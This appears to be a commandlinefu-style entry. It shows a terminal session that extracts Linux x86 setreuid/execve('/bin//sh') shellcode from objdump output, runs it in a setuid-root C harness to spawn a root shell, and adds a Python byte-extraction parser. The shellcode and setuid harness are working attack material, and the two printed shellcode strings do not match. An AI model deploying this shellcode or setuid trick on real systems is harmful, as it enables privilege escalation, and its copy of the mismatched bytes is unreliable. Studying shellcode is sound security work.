gunslinger@localhost:~/$ objdump -d shell

shell:     file format elf32-i386

Disassembly of section .text:

08048060 <.text>:
 8048060:   31 c0                   xor    %eax,%eax
 8048062:   31 db                   xor    %ebx,%ebx
 8048064:   31 c9                   xor    %ecx,%ecx
 8048066:   31 d2                   xor    %edx,%edx
 8048068:   b0 46                   mov    $0x46,%al
 804806a:   31 db                   xor    %ebx,%ebx
 804806c:   31 c9                   xor    %ecx,%ecx
 804806e:   cd 80                   int    $0x80
 8048070:   b0 0b                   mov    $0xb,%al
 8048072:   53                      push   %ebx
 8048073:   68 2f 2f 73 68          push   $0x68732f2f
 8048078:   68 2f 62 69 6e          push   $0x6e69622f
 804807d:   89 e3                   mov    %esp,%ebx
 804807f:   31 c9                   xor    %ecx,%ecx
 8048081:   31 c9                   xor    %ecx,%ecx
 8048083:   53                      push   %ebx
 8048084:   cd 80                   int    $0x80

gunslinger@localhost:~/$ objdump -d ./shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xc9\xcd\x80\x31\xc0\xb0\x0b\x31\xdb\xcd\x80"
gunslinger@localhost:~/$

-------------------------------shellcodetest.c---------------------------------
char shellcode[] =
    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31"
    "\xc9\xcd\x80\xb0\x0b\x53\x68\x2f\x2f\x73\x68\x68\x2f"
    "\x62\x69\x6e\x89\xe3\x31\xc9\x31\xc9\x53\xcd\x80";

int main(void)
{
    (*(void(*)()) shellcode)();
}
------------------------------------EOF----------------------------------------

root@localhost:/home/gunslinger/# vim shellcodetest.c
root@localhost:/home/gunslinger/# cat shellcodetest.c
char shellcode[] =
    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31"
    "\xc9\xcd\x80\xb0\x0b\x53\x68\x2f\x2f\x73\x68\x68\x2f"
    "\x62\x69\x6e\x89\xe3\x31\xc9\x31\xc9\x53\xcd\x80";

int main(void)
{
    (*(void(*)()) shellcode)();
}
root@localhost:/home/gunslinger/# gcc -o shellcodetest shellcodetest.c
root@localhost:/home/gunslinger/# chown root:root shellcodetest.c
root@localhost:/home/gunslinger/# chmod 4755 shellcodetest
root@localhost:/home/gunslinger/# exit

gunslinger@localhost:~/$ ./shellcodetest
# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# echo GAMEOVER
GAMEOVER
# exit
gunslinger@localhost:~/$
Better than the others, and actually works unlike some of them.
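The pipeline above is easy to get subtly wrong: the `cut -f1-6 -d' '` step keeps at most six byte fields per disassembly line, so the seventh byte of a long instruction is silently dropped, and the resulting string is never compared back against the listing (note that the sample string differs from the `shellcodetest.c` string in this very entry). The parser below is an added example, not part of the commandlinefu entry or its author's work. It assumes the default `objdump -d` text layout (address, tab, hex byte column, tab, mnemonic, with long instructions wrapped onto continuation lines that carry only bytes) and keeps every byte, so the output can be checked against the disassembly. The sample listing is constructed: its first lines mirror the entry above, while the `movl` and `cmpl` lines are made up to exercise a seven-byte instruction and a ten-byte one that objdump wraps.

```python
"""Extract the raw machine-code bytes from `objdump -d` text output.

Added example, not the entry's own command. Assumes objdump's default
layout: "<addr>:<TAB><hex bytes, space separated, padded><TAB><mnemonic>".
Continuation lines of long instructions have the address and bytes only.
"""
import re

_ADDR_RE = re.compile(r'^[0-9a-f]+:$')   # e.g. "8048060:"
_BYTE_RE = re.compile(r'^[0-9a-f]{2}$')  # one hex byte like "c0"


def parse_objdump_bytes(text: str) -> bytes:
    """Return every byte listed in the byte column, in listing order.

    Header lines ("file format ...", "Disassembly of section", symbol
    labels) contain no tab-separated byte column and are skipped. Anything
    non-hex inside the byte column is treated as a parse error rather than
    silently ignored, so a changed objdump format is noticed.
    """
    out = bytearray()
    for line in text.splitlines():
        fields = line.split('\t')
        if len(fields) < 2 or not _ADDR_RE.match(fields[0].strip()):
            continue
        for tok in fields[1].split():
            if not _BYTE_RE.match(tok):
                raise ValueError(f'unexpected token {tok!r} in byte column: {line!r}')
            out.append(int(tok, 16))
    return bytes(out)


def to_c_string(data: bytes) -> str:
    """Render bytes as one double-quoted C string literal of \\xNN escapes."""
    return '"' + ''.join(f'\\x{b:02x}' for b in data) + '"'


# Constructed sample objdump output (not captured from a real binary).
# Lines 1-3 mirror the listing in the entry; the movl line is a 7-byte
# instruction (the pipeline's cut -f1-6 would drop its last byte); the cmpl
# line is 10 bytes, which objdump prints as 7 bytes plus a continuation line.
SAMPLE = (
    "\n"
    "shell:     file format elf32-i386\n"
    "\n"
    "Disassembly of section .text:\n"
    "\n"
    "08048060 <.text>:\n"
    " 8048060:\t31 c0                \txor    %eax,%eax\n"
    " 8048062:\tb0 46                \tmov    $0x46,%al\n"
    " 8048064:\t68 2f 2f 73 68       \tpush   $0x68732f2f\n"
    " 8048069:\tc7 45 fc 00 00 00 00 \tmovl   $0x0,-0x4(%ebp)\n"
    " 8048070:\t81 bd 10 ff ff ff 01 \tcmpl   $0x1,-0xf0(%ebp)\n"
    " 8048077:\t00 00 00 \n"
    " 804807a:\tcd 80                \tint    $0x80\n"
)


if __name__ == '__main__':
    data = parse_objdump_bytes(SAMPLE)
    print(f'{len(data)} bytes')
    print(to_c_string(data))
```

Run stand-alone it prints the byte count followed by the C literal; in practice you would feed it `objdump -d ./shell` via `sys.stdin.read()` instead of `SAMPLE` and compare the count against the number of bytes visible in the listing before using the string anywhere.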